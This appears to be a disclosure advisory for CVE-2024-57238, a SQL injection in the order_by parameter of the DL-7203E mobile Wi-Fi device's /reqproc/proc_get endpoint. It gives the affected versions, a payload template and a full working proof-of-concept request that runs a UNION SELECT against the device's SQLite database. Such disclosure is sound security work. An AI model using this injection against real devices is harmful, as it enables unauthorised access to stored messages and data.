4G LTE Mobile Wi-Fi DL7203E Authenticated SQL Injection (CVE-2024-57238)

CVE-2024-57238, a SQL Injection vulnerability was identified in the /reqproc/proc_get endpoint of the application.

A SQL Injection vulnerability was identified in the /reqproc/proc_get endpoint of the application. The vulnerability allows an attacker to manipulate SQL queries by injecting malicious SQL code into the order_by parameter. This could potentially lead to unauthorized data access, data exfiltration, or database manipulation.

Affected Components

• Product Model: 4G LTE Mobile Wi-Fi DL-7203E

• Model Number: DL-7203E

• Software Version: DL-7203E_V4.0.0B05_240423

• Hardware Version: V2.0

Payload

/reqproc/proc_get?isTest=false&cmd=sms_data_total&page=0&data_per_page=500&mem_store=1&tags=10&order_by=[...SQL_HERE..]&_=1733070212972

Proof of Concept

GET/reqproc/proc_get?isTest=false&cmd=sms_data_total&page=0&data_per_page=500&mem_store=1&tags=10&order_by=union select 1,2,3,sqlite_version(),5,6,7,8,9,10,11,12-- -&_=1733070212972 HTTP/1.1
Host: 192.168.15.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://192.168.15.1/index.html